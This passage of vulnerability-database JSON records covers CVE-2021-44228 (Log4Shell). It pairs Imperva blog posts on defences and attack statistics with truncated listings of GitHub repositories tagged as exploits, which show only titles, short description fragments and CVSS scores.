"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-04T10:44:57", "type": "impervablog", "title": "2021 in Review, Part 4: 5 Cybersecurity Topics to Watch in 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T10:44:57", "id": "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96", "href": "https://www.imperva.com/blog/2021-in-review-part-4-5-cybersecurity-topics-to-watch-in-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T14:37:23", "description": "Today, everyone is talking about CVE-2021-44228, and with good reason. But before that, here were five of the issues that dominated virtual \u201cwater cooler talk\u201d in 2021:\n\n## [5\\. Data security in the cloud](<https://www.imperva.com/blog/whats-different-about-data-security-in-the-cloud-almost-everything/>)\n\nChampion heavyweight boxer Mike Tyson said, \u201cEveryone has a plan until they get punched in the face.\u201d For many security practitioners, their digital transformation plan went out the window when the pandemic punched them in the face. The orderly migration of workloads to a private, public, or hybrid cloud was accelerated but data security in many instances didn\u2019t come along for the ride.\n\nWhen organizations move workloads quickly, they often lose track of where their sensitive data resides. They should create a foundation layer of visibility into the data because doing so addresses most compliance requirements and enables security risk mitigation. To establish some level of baseline behavior, you must know the \u201c6 Ws\u201d of your data. Who\u2019s accessing it, what they\u2019re doing with it, why they need it, where they\u2019re accessing it from, when they\u2019re accessing it, and which servers they\u2019re using.\n\nThis is an ambitious plan, but more straightforward than you might think. [Learn more](<https://www.imperva.com/products/sonar-cyber-security-platform/>).\n\n## [4\\. Reprioritizing security requirements](<https://www.imperva.com/blog/reprioritizing-security-requirements-for-2021/>)\n\nAccelerating cloud migration in the middle of a pandemic compelled many cybersecurity professionals to think critically about recalibrating and reprioritizing their organizations\u2019 security requirements. Here are three imperatives:\n\n * **Shift to a zero-trust model where the data resides and around the identity of users.** In this model, the telemetry of tracing where users go, where they\u2019re coming from, and how they\u2019re interfacing and interacting with data becomes the new target for how to secure the assets in your environment.\n * **Get in front of security requirements for cloud-based assets.** Most organizations don\u2019t have a long-standing, solid security posture to go with cloud environments. The \u201c[blank] as a service\u201d approach is introducing ever more risk into the software supply chain and third-party services. Security people need to help business leaders understand the risks of these environments and help manage them.\n * **Manage threat fatigue as you struggle to stay on top of the cyber threat landscape changes.** Learn to identify where the risk is and filter out events with which there is no risk associated. Ultimately, you should have a dashboard that tells you \u201cthis is an event that matters, here is all the other information you need that goes along with this event.\u201d\n\n## [3\\. Imperva\u2019s acquisition of CloudVector](<https://www.imperva.com/blog/imperva-to-acquire-cloudvector/>)\n\nOur customers depend on Imperva to be on top of the next big thing. The future of applications and the ways they are compromised start with APIs. They empower businesses to develop applications in new microservice architectures, automate business-to-business processes and provide a back-end for mobile applications. This reality has not been lost on cybercriminals, who have taken notice of the shift towards an API economy and are discovering new attack vectors targeting them. Imperva is set to meet the critical need for organizations to adopt new security measures that can better [protect their APIs](<https://www.imperva.com/products/api-security/>).\n\n## [2\\. Imperva\u2019s recognition as a \u2018Leader\u2019 in The Forrester Wave: DDoS Mitigation Solutions, Q1 2021 Report](<https://www.imperva.com/blog/imperva-recognized-for-performance-in-the-forrester-wave-ddos-mitigation-solutions-q1-2021-report/>)\n\nIn the report, which evaluates DDoS mitigation solution providers to identify and analyze the most significant among them, Forrester describes Imperva as \u201can application security specialist vendor that fields a distributed global network to manage DDoS attacks combined with its own custom appliances (Behemoths) in its data centers to handle the heavy lifting of fighting DDoS attacks\u201d. The report ranks Imperva in the top two in the Current Offering category and we achieved the highest score available in thirteen of the criteria in the Forrester Wave  DDoS Mitigation Solutions Scorecard. You can see the report [here](<https://www.imperva.com/resources/resource-library/reports/the-forrester-wave-ddos-mitigation-solutions-q1-2021/>).\n\n## [1\\. FireEye and SolarWinds breaches](<https://www.imperva.com/blog/2020-ends-with-a-bang/>)\n\nWhile these events occurred in 2020, their repercussions were felt and talked about well into 2021. FireEye\u2019s breach included a leak of its red team tools arsenal, and while all of Imperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) customers were protected from malicious usage of these tools, we saw a rise in attacks based on these tools and vulnerabilities \u2013 and we detected and blocked them all.\n\nThe late 2020 SolarWinds supply chain attack and the subsequent breach had a huge impact. For Imperva customers, we added security controls against two attack vectors \u2013 SUPERNOVA .NET webshell access and SolarWinds Orion API authentication bypass. For several months, we saw massive scanning attempts across Imperva\u2019s customer base, with hackers trying to find systems with vulnerable SolarWinds to exploit.\n\nThe post [2021 in Review, Part 3: 5 Things Security Professionals Were Discussing this Year](<https://www.imperva.com/blog/2021-in-review-part-3-5-things-security-professionals-were-discussing-this-year/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T13:26:47", "type": "impervablog", "title": "2021 in Review, Part 3: 5 Things Security Professionals Were Discussing this Year", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-30T13:26:47", "id": "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "href": "https://www.imperva.com/blog/2021-in-review-part-3-5-things-security-professionals-were-discussing-this-year/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Since it was disclosed on Friday, December 11, I have spoken with many customers about CVE-2021-44228 and the ways Imperva is working to ensure that [they are protected](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>). Countless others have contacted us with questions about ways to mitigate the impact from the Log4j vulnerability. \n\nIn the spirit of transparency and information sharing, we\u2019ve aggregated below the most common questions we\u2019ve received to date and the answers we\u2019ve been providing to assist our customers through this time. \n\nThis is a complex and evolving situation -- one that takes partnership, diligence and patience. The global Imperva team is dedicated to helping you. We will continue to keep you informed with additional information as it becomes available.\n\n**Q: What is the state of Imperva\u2019s Application Security product posture?**\n\nA: Imperva Cloud Web Application Firewall (WAF), Imperva WAF Gateway and Imperva RASP were not affected by CVE-2021-44228. All Application Security products have the ability to detect and block exploits targeting the CVE.\n\n**Q: Is Imperva implementing rule changes for the Imperva Cloud Web Application Firewall (WAF) to combat Apache Log4j2?**\n\nA: Absolutely. We\u2019ve deployed a dozen security rule updates since CVE-2021-44228 was disclosed to help our customers mitigate new attack variants.\n\nWe saw initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC. As said in our initial blog post, our existing security rules put in place for Imperva Cloud WAF customers mitigated these early CVE attacks without requiring any patching. \n\nImperva Threat Research detected new CVE-specific attack variants, resulting in the creation of additional security rules on December 10, 2021 at 5:41 UTC. These updates were tested and deployed to the Imperva Global Network and ThreatRadar Feed on December 10, 2021 at 11:44 UTC. \n\nOver the last few days, we\u2019ve detected new variants and responded by creating and deploying updated rules. Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules based on new attack variants. \n\n**Q: What rule changes are being implemented for Imperva WAF Gateway (GW) to combat Apache Log4j2?**\n\nA: After monitoring initial attacks attempting to exploit this CVE starting around December 9, 2021 at 18:00 UTC, Imperva Threat Research immediately began creating additional security rules for Imperva WAF GW. \n\nManual rules were supplied to Imperva WAF GW customers to mitigate CVE-specific attacks. An Imperva Documentation [knowledge base article](<https://docs.imperva.com/howto/9111b8a5>) (login required) contains the signature information for creating the specific rule. This document was updated as of December 13, 2021 15:30 UTC.\n\nCustomers that have Threat Radar Emergency Feed Services received an initial update with these CVE-specific rules on December 10, 2021 11:30 UTC. As new variants were discovered, updated rules were published to Threat Radar on December 11, 2021 10:30 UTC, December 11, 2021 3:30 UTC and December 13, 2021 12:20 UTC.\n\nCustomers using Imperva Application Defense Center (ADC) were able to receive an update on December 13, 2021 at 10:00 UTC. ADC content can be updated manually or automatically. For information about configuring ADC, please visit the [ADC Update Guide](<https://docs.imperva.com/bundle/v12.6-administration-guide/page/6874.htm>).\n\nJust like for Cloud WAF, Imperva Threat Research is continuing to monitor, create, test and deploy CVE-specific security rules for WAF GW based on new attack variants. \n\n**Q: For both Imperva Cloud WAF and Imperva WAF GW, where can I see if I am getting hit by traffic related to this Remote Code Execution (RCE) exploit? Is there a dashboard to help me?**\n\nA: Imperva Cloud WAF customers can see the CVE\u2019s activity in Imperva Attack Analytics (screenshot below).\n\nIncidents in Imperva Attack Analytics can be filtered by this specific CVE (screenshot below).\n\nOnce Imperva WAF GW customers establish the appropriate signatures (manually, via Threat Radar or via ADC), they will be able to see alerts and block events within the MX or within their SIEM, where log events are ingested. The default logging templates should include signature names and events like \u201cCVE-2021-44228: Zero day RCE in Log4j2 via LDAP JNDI parser\u201d.\n\n**Q: If I have Imperva RASP deployed across my Java applications, am I protected?**\n\nA: Yes. Given the nature of how Imperva RASP works, RCEs caused by CVE-2021-44228 were stopped without requiring any code changes or policy updates (additional details below). Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected if Imperva RASP is currently deployed.\n\n**Q: What types of vulnerabilities does Imperva RASP protect out of the box?**\n\nA: Imperva RASP is complementary to Imperva WAF. While the latter keeps bad traffic out, RASP mitigates the risk posed by unknown exploits in first or third-party code/dependencies. By being embedded in the application, RASP has direct visibility into attacks relating to a RCE, which is an advantage for detecting and stopping a specific class of attack.\n\n**Q: Where can I learn more about Imperva RASP? **\n\nA: Imperva RASP is an industry-leading product that is designed to protect against zero-days and the OWASP Top 10 application security threats, injections and weaknesses. Learn more [here](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>).\n\n**Q: Is the Log4j vulnerability impacting any of Imperva's corporate systems (including customer/partner portals and FTP)?**\n\nA: No. Imperva worked quickly to update all vulnerable systems immediately after becoming aware of CVE-2021-44228, including third-party vendor solutions. Additionally, Imperva does not have any corporate external systems that are affected by this specific CVE.\n\n**Q: I need assistance or have questions. Who should I contact?**\n\nA: For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F>). If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions ](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:55:49", "type": "impervablog", "title": "Continuing to Stay Ahead of CVE-2021-44228: Addressing Your Top Questions", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T22:55:49", "id": "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "href": "https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T06:45:07", "description": "Over the last week, Imperva Threat Research observed interesting data points related to CVE-2021-44228. Despite new variants being discovered and patched by our team, we wanted to share five interesting things that we\u2019ve learned from analyzing a subset of our overall global network traffic.\n\n## Attacks & Attacked Sites\n\nSince last week, attackers have used a combination of manual and automated tools to **target 84,000 sites** protected by Imperva Cloud WAF. Across the targeted sites, Imperva Cloud WAF has **blocked more than 20 million attacks** that were attempting to exploit CVE-2021-44228.\n\nImperva is proactively reaching out and working closely with customers whose sites are being heavily targeted. Specifically, we have created and delivered attack-related dashboards, reports, and statistics to highly targeted customers.\n\n## Classified Clients\n\nOne thing many people don\u2019t realize is that we\u2019ve built advanced client classification detection algorithms in our Cloud WAF. We leverage client classification as part of our overall security defense system, and of course share the highlights in our customer dashboards. Client values include things like web browser names (Chrome, Safari, etc.) as well as developer tools (cURL, wget, etc.). \n\nWhen looking at the overall logs, we found a couple of interesting data points with respect to the clients that generated this attack traffic:\n\n * ~47% of classified clients were developed using the Go programming language. This doesn\u2019t come as a surprise, as the Go language is popular, has a great built-in HTTP client library, and is an easy and highly performant approach for developers to execute concurrent requests (goroutines, channels, etc.). The long tail of clients that we classified were written in Ruby and Python.\n * ~45% of classified clients were automated bad bots, and in some cases, are the same bots that have been used previously for attacks like account takeover, scraping, token fraud, etc.\n\n## Globally Targeted Industries\n\nThe top targeted industries include the following:\n\nAs you can see from the above chart, it appears like a normal distribution across targeted industries. \n\n## Top 10 Countries Attacking US Customers\n\nWhen factoring in the attacking country of origin targeting the United States, the data reveals several interesting points.\n\nIt gets even more interesting when breaking down the attacking countries targeting industries:\n\n 1. 9 of the top 10 attacking countries are European. These 9 countries focused on customers in Computing & IT, Financial Services, and Travel.\n 2. Finland was the largest source targeting Computing & IT.\n 3. India was the only non-European country in the top 10 attacking countries list. Attackers in India, like Sweden, exclusively focused on Financial Services.\n\nImperva Threat Research is currently working on an exciting report around attack variants, how we responded, and even some video demonstrations. We look forward to sharing that report on the Imperva Blog in the coming days. \n\n[Learn how](<https://www.imperva.com/blog/continuing-to-stay-ahead-of-cve-2021-44228-addressing-your-top-questions/>) Imperva is continuing to stay ahead of CVE-2021-44228. For customers looking for support, please access the [Imperva Support Portal](<https://support.imperva.com/s/login/?ec=302&startURL=%2Fs%2F&_ga=2.79178577.490459591.1639630100-8729200.1639182510>). If you\u2019re looking for protection from CVE-2021-44228, please [contact us](<https://www.imperva.com/contact-us/>).\n\nThe post [5 Things We\u2019ve Learned About CVE-2021-44228](<https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T06:44:55", "type": "impervablog", "title": "5 Things We\u2019ve Learned About CVE-2021-44228", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T06:44:55", "id": "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "href": "https://www.imperva.com/blog/5-things-weve-learned-about-cve-2021-44228/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-05-10T22:06:38", "description": "# Log4j-CVE-2021-44228 detector scanner playbook\n\n[![CI](https:/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T22:14:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-10T21:09:57", "id": "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T05:33:31", "description": "## Overview\nThis guide shows how to setup Git in your machine an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T01:53:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T03:11:56", "id": "6F251270-3935-58F4-835C-C9D26FA97CD6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-24T14:12:20", "description": "# log4j-CVE-2021-44228-workaround\n\nA. Solution Description\n=====...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T04:23:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T13:35:26", "id": "C306DCEF-59B3-5147-8169-3674490BD35F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-19T12:41:25", "description": "# CloudArmor \u00b7 Runtime Application Self-Protection Module - Log4...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T06:42:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-19T08:41:19", "id": "30BD2114-A602-52D3-908F-8B66A46F1A8C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T17:07:12", "description": "# vuln_spring_log4j2\n\nVulnerable spring application for testi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-16T13:05:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T15:50:45", "id": "931205E1-36E0-52BF-A978-D4C326F6A32A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-28T14:55:03", "description": "# Apache-Log4j-POC CVE-2021-44228\nProof of Concept of apache log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T22:44:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-28T13:04:32", "id": "42098CCD-C708-53FC-B3CD-5A8356B69359", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-03T19:27:57", "description": "# log4j-pcap-activity\nA fun activity using a packet capture file...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T16:09:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-05-03T13:02:34", "id": "47670E23-A165-5F5D-8C90-5C76DA1ADFEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-05T11:09:07", "description": "# log4j2-web-vulnerable\nA simple vulnerable web app ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T08:13:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T09:11:45", "id": "356A7EC9-4E47-52B9-856C-0215B3D9C70E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T23:09:00", "description": "# log4j2-hack-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 